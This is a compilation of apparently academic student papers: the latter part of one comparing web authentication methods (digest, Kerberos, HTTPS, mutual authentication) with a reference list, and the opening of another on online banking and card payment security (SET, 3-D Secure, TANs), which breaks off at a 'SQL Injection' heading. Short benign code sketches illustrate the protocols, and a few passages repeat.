Advantages: Digest authentication was developed to tackle the fundamental problem of basic authentication: the plaintext transmission of the user's password over the physical network. The user's password is not used directly in the MD5 digest, which allows some implementations to store the digest values instead of the plaintext password. The client nonce in the response allows the client to prevent chosen-plaintext attacks. The server nonce can include timestamps, allowing the server to inspect the nonce attributes sent by clients to prevent replay attacks. Lastly, the server may maintain a list of recently issued server nonce values to prevent reuse.
Disadvantages: In general, digest authentication is an enhanced form of single-factor authentication, and single-factor authentication is vulnerable to man-in-the-middle attacks; it has no mechanism for clients to verify the server's legitimacy. Furthermore, most of the security options specified in RFC 2617 are optional. If the server is not strict about the quality of protection, the client might operate in the lower-security RFC 2069 digest mode, which is likewise vulnerable to a man-in-the-middle attacker who instructs the clients to use RFC 2069 digest authentication [23]. Another weakness lies in the passwords, which must be stored in a reversibly encrypted form so that the server can access them and run them through checksum algorithms [26]. This authentication method is not as secure as client-certificate or mutual authentication, but it is better than basic access authentication.
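The response construction just described maps directly onto a few hashlib calls. This sketch follows the RFC 2617 qop="auth" formula; the credentials, realm and nonces are invented for illustration:

```python
import hashlib

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

# Hypothetical values a server challenge and client request might carry.
username, realm, password = "HarryPotter", "hogwarts@example.com", "Gryffindor"
method, uri = "GET", "/common-room/"
nonce, cnonce, nc, qop = "dcd98b7102dd2f0e", "0a4f113b", "00000001", "auth"

ha1 = md5_hex(f"{username}:{realm}:{password}")   # never sent on the wire
ha2 = md5_hex(f"{method}:{uri}")
response = md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")

# The client sends `response`; the server, knowing ha1, recomputes and compares.
print(response)
```

Note that the server only needs ha1, not the password itself, which is why some implementations store the digest instead of the plaintext password.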
Kerberos. Kerberos was created by the Massachusetts Institute of Technology as a solution to network security problems. Kerberos is a network authentication protocol designed to provide strong authentication for client/server applications using secret-key cryptography. It provides tools for authentication and strong cryptography over the network to help a client prove its identity to a server (and vice versa) across an insecure network connection [3]. After that, communication between the client and server is encrypted to assure privacy and data integrity.

Implementation of Kerberos. Kerberos works by encrypting data with symmetric keys whose details are sent to a key distribution center (KDC) instead of directly between each pair of computers. The KDC maintains a database of secret keys: each entity on the network (client or server) shares a secret key known only to itself and to the KDC [19]. The KDC consists of two logically separate parts: an Authentication Server (AS), which proves an entity's identity using knowledge of the secret key, and a Ticket Granting Server (TGS), which generates session keys for encrypting transmissions during communication. When the client logs in with its password, the AS verifies the client's identity and grants it a Ticket Granting Ticket (TGT) [20]. The TGT contains identification credentials such as a randomly created session key and a timestamp limiting it to eight hours. When the client wants to contact some service server (SS), the client contacts the TGS, using the ticket to prove its identity, and asks for the service; the client can reuse this ticket as long as it has not expired. If the client is eligible for the service, the TGS sends another ticket to the client. The client then contacts the SS and uses this latter ticket to authenticate itself and prove that it has approval to receive the service.
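The ticket flow can be caricatured in a few lines of Python using Fernet symmetric encryption from the third-party pyca/cryptography package. This is a deliberately simplified toy, not the real protocol: actual Kerberos tickets carry realms, flags, addresses and authenticators, and use their own encodings. All names here are invented:

```python
# Toy single-realm Kerberos-style exchange (pip install cryptography).
import json, time
from cryptography.fernet import Fernet

# Long-term secret keys, each shared pairwise with the KDC only.
client_key, tgs_key, service_key = (Fernet.generate_key() for _ in range(3))

def as_issue_tgt(client_name: str) -> tuple[bytes, bytes]:
    """AS step: return (TGT sealed under the TGS key, session key sealed
    under the client's long-term key)."""
    session_key = Fernet.generate_key()
    tgt = Fernet(tgs_key).encrypt(json.dumps(
        {"client": client_name, "session_key": session_key.decode(),
         "expires": time.time() + 8 * 3600}).encode())   # eight-hour lifetime
    return tgt, Fernet(client_key).encrypt(session_key)

def tgs_issue_ticket(tgt: bytes, service: str) -> bytes:
    """TGS step: open the TGT and issue a service ticket sealed under the
    service's long-term key."""
    claims = json.loads(Fernet(tgs_key).decrypt(tgt))
    assert claims["expires"] > time.time(), "TGT expired"
    return Fernet(service_key).encrypt(json.dumps(
        {"client": claims["client"], "service": service}).encode())

tgt, sealed_session = as_issue_tgt("alice")
session_key = Fernet(client_key).decrypt(sealed_session)  # only alice can do this
ticket = tgs_issue_ticket(tgt, "imap/mail.example.com")
print(json.loads(Fernet(service_key).decrypt(ticket)))    # service verifies alice
```

The key property the toy preserves is that alice's password-derived key never travels on the wire; only sealed tickets do.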
As Kerberos was designed for use with single-user client systems but not all client systems are single-user systems [12]. In the case of multi-user system, the Kerberos authentication scheme can still be susceptible to a variety of ticket-stealing and replay attacks. 3 Suggestions to Web Developers Web developers intending to secure their applications would have to consider the different kinds of password authentication methods to employ to suit their web applications. Some factors to consider that may affect the choice of authentication would be cost and efficiency issues. Twitter and Basic Authentication. Before 10th August 2010, Twitter made use of basic authentication for logging into the Twitter server. The switch to another form of authentication, Open Authorization (OAuth) was made due to the lack of security that basic authentication provides. With basic authentication, the client provides his/her username and password to third parties over the network in plaintext whenever a new page is requested. This makes it very easy for packet sniffers to intercept passwords. Also, the server stores passwords, making it a liability in the case when passwords are leaked. In addition to that, the performance of basic authentication is rather inefficient. Every page requested by the client would require a lookup for the user in the database. This would result in a less efficient server, especially when a large number of people are using the server. 230 Therefore, although basic authentication is the simplest form of authentication that one can make use of, it is not particularly secure and is easy to hack if and when any malicious attempt is made. Unless the web application is not particularly in need of any security, in the case of a simple personal project, then basic authentication might be used. However, in the instance of a more secure environment, such as banking services, basic authentication should not be used. Facebook and HTTPS. Facebook, one of the most popular social media sites used by millions around the world would require a reasonable level of security. The numerous photos posted on Facebook with people tagged require a higher level of security for the sake of personal privacy. The developers of Facebook realize the need for such security and have obtained SSL certificates which allow users to browse over HTTPS. Some issues regarding HTTPS are cost and latency. The cost for licensing the certificate is approximately over $1,000 for a single year alone. It is due to the high costs that some web developers shun away from these licenses, to keep costs at a minimum. However, in the case of Facebook, this cost is essential and should not be avoided to secure the privacy of the millions of users. Latency is due to the fact that there are more steps to carry out for verification (‘handshakes’) as opposed to basic authentication. These extra handshakes are necessary in HTTPS authentication before data is sent to the client. Nevertheless, the slight latency is a small price to pay for security. In fact, with the advancement of technology, latency would be improved as networks develop. Financial Industry and Mutual Authentication. In the financial industry, both users and banking systems need assurance that each party is authentic. This is important to make sure that bank customers would not leak their credential information to phishing websites, while the system would only allow bank customers to access. 
Facebook and HTTPS. Facebook, one of the most popular social media sites, used by millions around the world, requires a reasonable level of security; the numerous photos posted on Facebook with people tagged in them demand a higher level of protection for the sake of personal privacy. The developers of Facebook recognize this need and have obtained SSL certificates that allow users to browse over HTTPS.

Two issues with HTTPS are cost and latency. Licensing a certificate can cost over $1,000 for a single year, and it is because of such high costs that some web developers shy away from these licenses to keep expenses at a minimum. In the case of Facebook, however, this cost is essential and should not be avoided, as it secures the privacy of millions of users. Latency arises because HTTPS requires more verification steps ("handshakes") than basic authentication before data is sent to the client. Nevertheless, the slight latency is a small price to pay for security, and latency will improve as technology advances and networks develop.

Financial Industry and Mutual Authentication. In the financial industry, both users and banking systems need assurance that the other party is authentic. This matters because bank customers must not leak their credentials to phishing websites, while the system must grant access only to genuine bank customers. Mutual authentication is considered a secure method for this authentication process. However, few financial organizations implement it, because of the high implementation cost: public-key certificates issued by a trusted certificate authority (CA) such as VeriSign are expensive, so it is hard for ordinary users to obtain certificates that servers can use to identify them.

Bank customers can verify the public key of an Internet banking website such as DBS Bank Ltd (internet-banking.dbs.com.sg), since the identity of DBS Bank Ltd has been verified by VeriSign; users can thus be assured that they are communicating with the legitimate DBS website. Conversely, the DBS web server cannot easily check the legitimacy of individual clients through digital certificates. The web server attempts to match the signature on a client certificate to a known CA using the web server's certificate store, and if the client's certificate is not registered under any CA, a web server using mutual authentication simply refuses connections from that unauthenticated client. Hence, banking systems have to use other security measures, such as two-factor authentication involving a token and a password, to make the authentication process more robust.

Digest Authentication. Nowadays more e-commerce websites are using SSL to protect users' login credentials. These websites often buy a costly SSL server certificate from a CA and use it only for authentication, because the SSL encryption routine seriously taxes a web server under heavy load; Microsoft Hotmail, for example, uses SSL only to encrypt its users' login page and switches to unencrypted HTTP after that. Even where SSL is used, many web applications still store users' passwords in plain text in the database, so an attacker can easily retrieve all the credential information if the web server is compromised.

Digest authentication is therefore a fairly secure and cheaper authentication method for web application developers to consider. With digest authentication, users' login credentials are never transmitted across the network, nor are they stored in the database in plain text. Web developers with limited financial resources do not need to purchase expensive digital certificates every year. Furthermore, the authentication is performed by the web server itself; the web application only has to ensure that authentication is in place. The digest authentication protocol uses hashes instead of plain text; developers may build their own hash-based authentication mechanism, but it is far more reliable to use an existing digest mechanism. However, digest authentication is suitable only for protecting usernames and passwords. SSL remains the best method if the transmitted content needs protection or if users need assurance that they are connecting to the legitimate server. Web application developers should also note that digest authentication is a single-factor method and is thus subject to the weaknesses of traditional authentication.
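For reference, the value the client actually sends in digest authentication is computed as follows. This is the basic RFC 2617 form, without the optional qop and cnonce fields; the credentials, URI and nonce below are hypothetical.

```python
# RFC 2617 digest computation: only the final response crosses the network.
import hashlib

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

username, realm, password = "alice", "example.com", "s3cret"
method, uri = "GET", "/account"
nonce = "dcd98b7102dd2f0e8b11d0f600bfb0"   # server-issued challenge

ha1 = md5_hex(f"{username}:{realm}:{password}")   # secret side
ha2 = md5_hex(f"{method}:{uri}")                  # request side
response = md5_hex(f"{ha1}:{nonce}:{ha2}")        # sent to the server
print(response)
```

Because the server issues a fresh nonce with each challenge, a captured response cannot simply be replayed against a later challenge.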
Kerberos. Kerberos is a viable and powerful solution to network security problems. It is an open standard managed by the Internet Engineering Task Force (IETF) [19], and many operating systems, such as IBM's AIX, Apple's Mac OS X, Linux distributions and Microsoft's Windows, use it for authentication in most of their login modules [22]. In addition, many remote login applications available on UNIX-like systems, such as OpenSSH, telnet and rlogin, have Kerberized versions. Kerberos is available both from mainstream vendors and as open source [32]. Numerous improvements have been made to Kerberos as the working model has matured over the years; it now supports multiple cryptographic algorithms, scales to large systems, and more. Given that Kerberos is mature, present in many operating systems and applications, and architecturally sound [22], it is a very feasible authentication system to use.

Although Kerberos is now stable and secure, there are factors that may deter its use. Kerberos is much more complicated than the other authentication methods discussed, so web developers may avoid it for simplicity's sake. Cost may be another factor, although Kerberos is available free on open source platforms; note, however, that open source and commercial Kerberos systems may differ, so developers need to weigh the factors carefully when choosing which Kerberos system to use.

4 Conclusion

We began by discussing the vulnerability of web applications and the possible attacks on authentication, described authentication methods that can counter some of those attacks, and ended by evaluating the methods and offering suggestions for web developers to consider when choosing among them. Technology will change and new hacking methods will appear, and authentication methods will need to change correspondingly to counter those attacks. There is no single perfect solution to security problems; web developers will have to continuously review their authentication techniques to protect the privacy of their systems and users.

Table 1. Overview of comparison among different authentication techniques.

Basic Authentication. Security level: Low. Method: passwords sent as plaintext. Vulnerabilities: man-in-the-middle attacks.

Form-based Authentication. Security level: Low. Method: passwords sent as plaintext; logout after a certain period of inactivity. Vulnerabilities: man-in-the-middle attacks.

HTTPS/SSL. Security level: High. Method: client authenticates the server through public-key certificates. Vulnerabilities: possibility of the server's public key being altered, leading the client to believe the (altered) key is legitimate.

Mutual Authentication. Security level: High. Method: exchange of certificates between client and server. Vulnerabilities: most web applications do not require client-side certificates.

Digest Authentication. Security level: Medium. Method: simple challenge-response paradigm with a digest session key. Vulnerabilities: man-in-the-middle attacks; password stored in a reversibly encrypted form; no mechanism to identify the server's legitimacy.

Kerberos. Security level: High. Method: passwords are never sent across the network; only secret keys in encrypted form are sent. Vulnerabilities: brute-force attacks against the KDC; susceptible to ticket-stealing and replay attacks.

References

1. Aldinger, T. (n.d.). What Are the Advantages of Kerberos? Retrieved October 15, 2011, from eHow: http://www.ehow.com/list_5981928_advantageskerberos_.html
2. Arumugam, P. (2002, December 12). J2EE Form-based Authentication. Retrieved October 13, 2011, from O'Reilly on Java: http://onjava.com/pub/a/onjava/2002/06/12/form.html
3. Bezroukov, N. (2010, May 06). Kerberos. Retrieved October 14, 2011, from Softpanorama: http://www.softpanorama.org/Authentication/kerberos.shtml
4. Conjecture Corporation. (2011). What is a Brute Force Attack. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-a-brute-force-attack.htm
5. Conjecture Corporation. (2011). What is a Dictionary Attack. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-a-dictionary-attack.htm
6. Conjecture Corporation. (2011). What is a Phishing Scam. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-a-phishing-scam.htm
7. Conjecture Corporation. (2011). What is Network Sniffing. Retrieved October 9, 2011, from WiseGeek: http://www.wisegeek.com/what-is-network-sniffing.htm
8. Conjecture Corporation. (2011). What is Session Hijacking. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-session-hijacking.htm
9. Conjecture Corporation. (2011). What is Spyware. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-spyware.htm
10. Conjecture Corporation. (2011). What is Pharming. Retrieved October 8, 2011, from WiseGeek: http://www.wisegeek.com/what-is-pharming.htm
11. Doshi, P., & Siddharth, S. (2010, November 2). Five common Web application vulnerabilities. Retrieved October 9, 2011, from Symantec Connect: http://www.symantec.com/connect/articles/five-common-web-applicationvulnerabilities
12. Duke University. (n.d.). Kerberos: Advantages and Weaknesses. Retrieved October 15, 2011, from Duke University: http://www.duke.edu/~rob/kerberos/kerbasnds.html
13. Dun & Bradstreet. (n.d.). Trust in Secure Identity. Retrieved October 3, 2011, from Dun & Bradstreet: http://www.dnb.com/US/communities/ecommerce/trust_secure.asp
14. Federal Financial Institutions Examination Council. (2001). Authentication in an Internet Banking Environment. Retrieved October 15, 2011, from Federal Financial Institutions Examination Council: http://www.ffiec.gov/pdf/authentication_guidance.pdf
15. Financial Services Technology Consortium. (2005). FSTC Blueprint for Mutual Authentication: Phase 1. Retrieved October 15, 2011, from Financial Services Technology Consortium: http://www.fstc.org/projects/docs/FSTC_Better_Mutication_v11.pdf
16. GlobalSCAPE, Inc. (n.d.). GlobalSCAPE Knowledge Base. Retrieved October 7, 2011, from GlobalSCAPE: http://kb.globalscape.com/KnowledgebaseArticle10691.aspx
17. IBM. (2010, September 20). Secure Sockets Layer client certificate authentication. Retrieved September 24, 2011, from IBM: WebSphere Application Server: http://publib.boulder.ibm.com/infocenter/wasinfo/v6r0/index.jsp?topic=%2Fcom.ibm.websphere.express.doc%2Finfo%2Fexp%2Fae%2Frsec_csiv2cca.html
18. IIS Admin Blog. (2007, October 8). How to Secure a Web Site Using Client Certificate Authentication. Retrieved September 24, 2011, from IIS Admin Blog: http://www.iisadmin.co.uk/?p=11
19. Kerberos (protocol) - Wikipedia, the free encyclopedia. (n.d.). Retrieved October 14, 2011, from Wikipedia: http://en.wikipedia.org/wiki/Kerberos_(protocol)
20. Learn Networking. (2008, January 28). How Kerberos Authentication Works. Retrieved October 15, 2011, from Learn Networking: http://learnnetworking.com/network-security/how-kerberos-authentication-works
21. McGowan, L. (2011, June 02). What Are the Advantages of Kerberos Authentication? Retrieved October 15, 2011, from eHow: http://www.ehow.com/info_8527576_advantages-kerberos-authentication.html
22. MIT Kerberos Consortium. (2008). kerberos.org. Retrieved October 25, 2011, from Kerberos: http://www.kerberos.org/software/whykerberos.pdf
23. Network Working Group. (1997). An Extension to HTTP: Digest Access Authentication. Retrieved October 10, 2011, from Network Working Group: http://tools.ietf.org/html/rfc2069
24. Network Working Group. (1999). HTTP Authentication: Basic and Digest Access Authentication. Retrieved October 15, 2011, from Network Working Group: http://tools.ietf.org/html/rfc2617
25. Oiwa, Y. (2008). HTTP Mutual Authentication Protocol Proposal. Research Centre for Information Security.
26. Open Web Application Security Project Foundation. (2010). Authentication in IIS. Retrieved October 16, 2011, from Open Web Application Security Project Foundation: https://www.owasp.org/index.php/Authentication_In_IIS
27. Red Hat. (n.d.). Introduction to Public-Key Cryptography: Certificates and Authentication. Retrieved October 3, 2011, from Red Hat Certificate System: http://docs.redhat.com/docs/enUS/Red_Hat_Certificate_System/8.0/html/Deployment_Guide/Introduction_to_Public_Key_Cryptography-Certificates_and_Authentication.html
28. SSL Shopper. (2011). Why SSL? The Purpose of using SSL Certificates. Retrieved October 13, 2011, from SSL Shopper: http://www.sslshopper.com/why-ssl-thepurpose-of-using-ssl-certificates.html
29. Sun Microsystems. (2005, December 6). Installing and Configuring SSL Support. Retrieved September 24, 2011, from The J2EE(TM) 1.4 Tutorial: http://java.sun.com/j2ee/1.4/docs/tutorial/doc/Security6.html#wp80737
30. Tech Target. (2007). Digest Authentication. Retrieved October 15, 2011, from Tech Target: http://searchsecurity.techtarget.com/definition/digest-authentication
31. Tech Target. (2007). Mutual Authentication. Retrieved October 15, 2011, from Tech Target: http://searchfinancialsecurity.techtarget.com/definition/mutual-authentication
32. University of Portsmouth. (2007, November 27). Kerberos - Commercial or Open Source? Retrieved October 25, 2011, from University of Portsmouth: http://mosaic.cnfolio.com/M591CW2007B103
33. Wang, X., & Yu, H. (n.d.). How to Break MD5 and Other Hash Functions. Retrieved October 15, 2011, from http://merlot.usc.edu/csac-f06/papers/Wang05a.pdf
34. Zaikin, M. (2005, March). Chapter 5. Web Application Security. Retrieved October 11, 2011, from SCWCD 1.4 Study Guide: http://java.boot.by/wcdguide/ch05s03.html

Data Security for E-transactions: Online Banking and Credit Card Payment Systems

Jun Lam Ho, Alvin Teh, Kaldybayev Ayan

Abstract. In this paper, we explore the environment and protocols used for online banking and credit card payment systems, including Secure Electronic Transaction (SET), 3-D Secure and Hypertext Transfer Protocol Secure (HTTPS). Subsequently, we study the threats commonly faced by these systems. Finally, we analyze the current systems and offer alternatives that may help to address their central problem: the insecurity of current e-transaction systems.

1 Introduction

Today, electronic transactions have made buying and selling products easy and convenient. An electronic transaction is the sale or purchase of goods or services, whether between businesses, individuals, governments or other public or private organizations, conducted over electronic systems such as the Internet or other computer-mediated networks. Payment for goods can be made by credit card (offline) or through online banking (online). Both methods are widespread around the world and play an important role in making payment convenient for both parties.
Online banking (or Internet banking) allows customers to conduct financial transactions on a secure website operated by their retail or virtual bank, credit union or building society. The ancestor of modern online banking was the distance banking service conducted over electronic media from the early 1980s, which gained users through terminals (with keyboard and monitor) that accessed the banking system over a phone line; another variant sent tones down a phone line carrying instructions to the bank. At the time, some of these online banking services never caught on and were commercial failures. Today, however, in a world of new technologies, many banks are Internet-only banks; unlike their predecessors, they differentiate themselves by offering better interest rates and richer online banking features.

Another popular type of payment today is payment by card. The term "payment card" covers a range of different cards that a cardholder can present to make a payment; such a card is essentially attached to an account that holds funds. Payment cards can be classified into categories such as credit cards, debit cards, charge cards, stored-value cards and fleet cards. Of these, the most popular are the credit card and the debit card, both of which provide an alternative to cash when making purchases.

Customers can also choose among a variety of e-check and e-cash systems. Electronic money, or e-cash, refers to money that is exchanged only electronically. Electronic money systems fall into three categories: centralized, decentralized and offline anonymous systems. E-cash systems such as PayPal, WebMoney and cashU function as centralized systems, selling their electronic currency directly to the end user. They too have become popular, since they allow online money transfers as electronic alternatives to traditional paper payment methods, such as checks and money orders.

Although new technologies make purchasing and selling goods convenient and make online shopping possible, one question concerns the users of these systems: is it safe? Security is the most crucial aspect of e-transactions. Without proper security, a system is open to hackers and fraud, which can cause great damage, chiefly the loss of funds and the exposure of customers' private information. Security is critical to the success of electronic commerce over the Internet: without privacy, consumer protection cannot be guaranteed, and without authentication, neither the merchant nor the consumer can be sure that valid transactions are being made. That is why all popular e-transaction systems pay close attention to the security of their systems and their customers.

1.1 Expanded CIA factors for e-transactions

E-transaction systems handle a huge number of transactions involving large sums of money and sensitive customer information. These systems operate under a set of security protocols and an environment that differ from those of other information systems. The main difference comes from the information these systems handle, which is defined by a set of characteristics. We will look at the characteristics of information that relate most closely to e-transaction systems, to gain a better understanding of the protocols and environment used to run them.

Confidentiality refers to the non-disclosure of information to unauthorized personnel.
This is achieved by means of the authentication provided by the e-transaction system, which grants authorized users access rights to the accounts they hold.

Integrity refers to the information being free from corruption and existing in complete form. Hashing is one method used to verify the integrity of information.

Availability refers to the ability of authorized users to gain access to information when needed, without obstruction.

Authenticity refers to the quality of the information being genuine or original. This is achieved, together with non-repudiation, by means of digital signatures and public-key encryption.

Accuracy refers to the information being free from error.

2 Protocols and Systems

2.1 Online shopping and payment

SET Protocol

Payment card systems mostly use Secure Electronic Transaction (SET). SET is an open encryption and security specification designed to protect credit card transactions on the Internet. It was developed by payment card companies such as Visa and MasterCard, and was supported by IBM, Microsoft, Netscape and other companies. It is a standard for protecting the privacy and ensuring the security of electronic transactions. With SET, a customer is given an electronic wallet (digital certificate), and a transaction is controlled using digital certificates and digital signatures among three parties: the purchaser, the seller, and the purchaser's bank. SET draws on a variety of security systems, such as Netscape's Secure Sockets Layer (SSL), Terisa System's Secure Hypertext Transfer Protocol (S-HTTP) and Microsoft's Secure Transaction Technology (STT).

What encryption mechanisms does SET use? SET uses both symmetric and asymmetric (public-key) encryption, as well as authentication mechanisms. The symmetric Data Encryption Standard (DES), with 56-bit session keys, encrypts the bulk of each transaction, while asymmetric encryption is used to transmit those session keys. In SET, message data is encrypted using a randomly generated symmetric key (a 56-bit DES key); this key is then encrypted using the message recipient's public key (RSA). The result is the so-called "digital envelope" of the message, which combines the encryption speed of DES with the key-management advantages of RSA public-key encryption. After encryption, the envelope and the encrypted message itself are sent to the recipient. On receiving the encrypted data, the recipient first decrypts the digital envelope using his or her private key to obtain the randomly generated symmetric key, and then uses that symmetric key to unlock the original message. However, 56-bit encryption is weak and can be cracked with powerful hardware; DES-cracking machines have in the past been built to recover message data. This is the main problem and concern with SET, since DES encrypts the majority of a SET transaction.
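A minimal sketch of such a digital envelope, using the third-party PyCryptodome package: a fresh DES key encrypts the message, and the recipient's RSA public key seals that DES key. Real SET specifies its own message formats and padding; the OAEP padding and the sample message here are stand-ins for illustration only.

```python
# Digital envelope sketch: DES for the body, RSA for the DES key.
from Crypto.PublicKey import RSA
from Crypto.Cipher import DES, PKCS1_OAEP
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad

recipient = RSA.generate(1024)            # 1024-bit modulus, as in SET

# Sender: encrypt the message under a fresh DES key...
des_key = get_random_bytes(8)             # 64 bits stored, 56 effective
iv = get_random_bytes(8)
body = DES.new(des_key, DES.MODE_CBC, iv).encrypt(
    pad(b"order data", DES.block_size))
# ...and seal the DES key with the recipient's RSA public key.
envelope = PKCS1_OAEP.new(recipient.publickey()).encrypt(des_key)

# Recipient: open the envelope with the private key, then decrypt the body.
recovered_key = PKCS1_OAEP.new(recipient).decrypt(envelope)
print(unpad(DES.new(recovered_key, DES.MODE_CBC, iv).decrypt(body),
            DES.block_size))              # b'order data'
```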
SET also uses asymmetric keys for digital signatures (message digests). As mentioned above, public-key cryptography in SET is used only to encrypt DES keys and for authentication (digital signatures), not for the main body of the transaction; the RSA modulus is 1024 bits long, and SET uses a distinct public/private key pair to generate digital signatures. Each SET member thus possesses two asymmetric key pairs: one used in the process of key encryption and decryption, and a "signature" pair for the creation and verification of digital signatures (160-bit message digests). The digest algorithm is designed so that it is computationally infeasible for two different messages to have the same message digest.

Now let us examine how the SET protocol makes use of the dual signature, as shown in Figure 1.

Figure 1: SET protocol using Dual Signature [1]

1. The Payment Information (PI), which contains all the information about the cardholder's card, is hashed to produce the Payment Information Message Digest (PIMD).
2. At the same time, the cardholder hashes the Order Information (OI) to get the Order Information Message Digest (OIMD).
3. The two message digests are then combined and hashed to produce the Payment and Order Message Digest (POMD).
4. The cardholder encrypts the POMD with his own private key to obtain the Dual Signature (DS).
5. The cardholder then sends: (a) OI, PIMD and DS to the merchant; (b) PI, OIMD and DS to the payment gateway [1].

This method ensures that the merchant, who receives the Order Information, the Payment Information Message Digest and the Dual Signature, cannot recover the payment information and thus cannot learn the cardholder's credit card number; having received the Order Information, the merchant nevertheless starts processing the order. Meanwhile the payment gateway, which receives the payment information, deducts the amount from the cardholder's account and sends it to the merchant.

SET meets, with some gaps, the following requirements:

- Confidentiality: payment information is secured, but order information is not.
- Data integrity: mathematical techniques are used to minimize corruption and detect malicious tampering.
- Client authentication: a digital ID (certificate) identifies the customer and is checked via the card's issuer.
- Merchant authentication: a digital certificate is likewise used as a back-check to confirm that the merchant is valid.

SET can work in real time or as a store-and-forward transfer, and it is backed by the major credit card companies and banks. Its transactions can be carried out over the Web or via email, and it provides confidentiality, integrity, authentication and non-repudiation. SET is a very comprehensive and very complicated security protocol; it is the main protocol for ensuring privacy and security during credit card payment.
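The dual-signature arithmetic in steps 1 to 4, and the merchant-side check implied by step 5(a), fit in a few lines. The sketch below uses PyCryptodome; the PI and OI byte strings are hypothetical stand-ins for SET's real message structures, and SHA-1 matches the 160-bit digests mentioned above.

```python
# Dual signature: DS = Sign(H(H(PI) || H(OI))) with the cardholder's key.
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA1
from Crypto.Signature import pkcs1_15

pi = b"card=4111...;amount=42.00"     # Payment Information (hypothetical)
oi = b"order=12 widgets"              # Order Information (hypothetical)

pimd = SHA1.new(pi).digest()          # step 1: PIMD, a 160-bit digest
oimd = SHA1.new(oi).digest()          # step 2: OIMD
pomd = SHA1.new(pimd + oimd)          # step 3: POMD over the concatenation

cardholder = RSA.generate(1024)
ds = pkcs1_15.new(cardholder).sign(pomd)   # step 4: the dual signature

# Step 5(a): the merchant holds (OI, PIMD, DS). It recomputes POMD and
# verifies the signature without ever seeing the card details inside PI.
pomd_check = SHA1.new(pimd + SHA1.new(oi).digest())
pkcs1_15.new(cardholder.publickey()).verify(pomd_check, ds)  # raises if forged
print("merchant verified the dual signature without seeing PI")
```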
3-D Secure

There exists another, newer security protocol called 3-D Secure. It was developed by Visa (under the product name Verified by Visa), the leading company in handling electronic transactions. 3-D Secure is based on the XML format and is used as an additional layer of security for credit and debit card transactions. Before long, the protocol was adopted by MasterCard and American Express, under the names MasterCard SecureCode and SafeKey respectively. 3-D Secure combines an online authentication process with SSL to protect credit card information during transmission. It is based on a three-domain model:

1. Acquirer Domain
2. Issuer Domain
3. Interoperability Domain [2]

The protocol uses XML messages sent over an SSL connection with client authentication, which ensures that both sides (server and client) are authenticated. 3-D Secure initiates a redirection to the bank that issued the client's card to authorize the transaction; in this way, the bank takes on the responsibility of ensuring a secure transaction. Both the merchant and the cardholder benefit in their own ways:

1. Merchants see a reduction in "unauthorized transaction" chargebacks.
2. Cardholders face a decreased risk of other people using their payment cards fraudulently on the Internet.

The card-issuing bank, or its Access Control Server (ACS), asks the buyer for a password that only the buyer and the bank know, ensuring that the merchant never learns the password. This decreases the risk in two ways:

1. Card details are not useful for purchasing without the additional password, which is not stored or written on the card.
2. Hackers cannot use credit or debit card information obtained from merchants, since no password information is ever given to merchants; there is no way for hackers to obtain that password.

3-D Secure works as follows: when an electronic transaction occurs on a 3-D Secure website and the cardholder pays using a credit or debit card enrolled in 3-D Secure, the MasterCard or Visa pop-up or inline-frame security screen appears. The user is asked to enter a password (which can be a combination of letters and numbers) known only to them. After authentication, MasterCard or Visa returns the user to the electronic commerce store.

2.2 Online banking

Today, many banks are Internet-only banks. Single-password authentication, as used on most secure Internet shopping sites, is considered insecure for personal online banking applications in most countries. To make online banking as secure as possible, two different security methods are in use:

- Personal Identification Number (PIN): a single password used for logging in, combined with one-time passwords (TANs) issued to authenticate individual transactions.
- Signature-based online banking, where all transactions are signed and encrypted digitally. The keys for signature generation and encryption can be stored on smart cards, thumb drives or any other memory medium, depending on the concrete implementation.

As the PIN is an easily understood security measure, we will examine the one-time password (TAN). The TAN is a second layer of security above and beyond traditional single-password authentication. TANs provide additional security by acting as a second factor: if a hacker manages to obtain the PIN, he or she cannot perform any operations without also knowing a valid TAN. TANs are mostly distributed in two ways:

1. Sending the online banking user's TANs by postal mail.
2. Sending the online banking user's TAN via SMS to the user's (GSM) mobile phone.

The second way of obtaining a TAN is considered the more secure, since the user receives an SMS quoting the TAN together with the transaction amount and details, and the TAN is valid only for a short period of time. The most secure way of using TANs is to generate them on demand with a security token; such token-generated TANs depend on the time and on a unique secret stored in the security token (two-factor authentication, or 2FA).
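The sketch below illustrates how a token can derive a time-limited TAN from a shared secret and the current clock. It follows the TOTP construction of RFC 6238 (an HMAC over a 30-second counter with dynamic truncation); the secret and digit count are illustrative, not any bank's actual scheme.

```python
# Time-based TAN generation in the style of TOTP (RFC 6238).
import hmac, hashlib, struct, time

def tan(secret: bytes, step: int = 30, digits: int = 6) -> str:
    counter = int(time.time()) // step               # changes every 30 s
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                          # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

shared_secret = b"per-customer token secret"         # stored in the token
print(tan(shared_secret))   # the bank computes the same value to verify
```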
Another security measure that all online banking websites use is Secure Sockets Layer (SSL) connections. The SSL protocol allows client/server applications to communicate across a network in a way designed to prevent eavesdropping and tampering. SSL encrypts the segments of network connections above the transport layer, using asymmetric cryptography for privacy and a keyed message authentication code for message reliability. Most online banking websites use Hypertext Transfer Protocol Secure (HTTPS) on port 443; HTTPS is the combination of the Hypertext Transfer Protocol (HTTP) and SSL/TLS. Examining the packets sent and received under the two protocols shows that HTTPS messages are encrypted and of no use to a hacker who captures them: everything in an HTTPS message is encrypted, including the headers and the request/response payload. An attacker can learn only that a connection is taking place between the two parties, along with the domain name and the IP addresses.

3 Threats Faced by E-Transaction Systems

SQL Injection

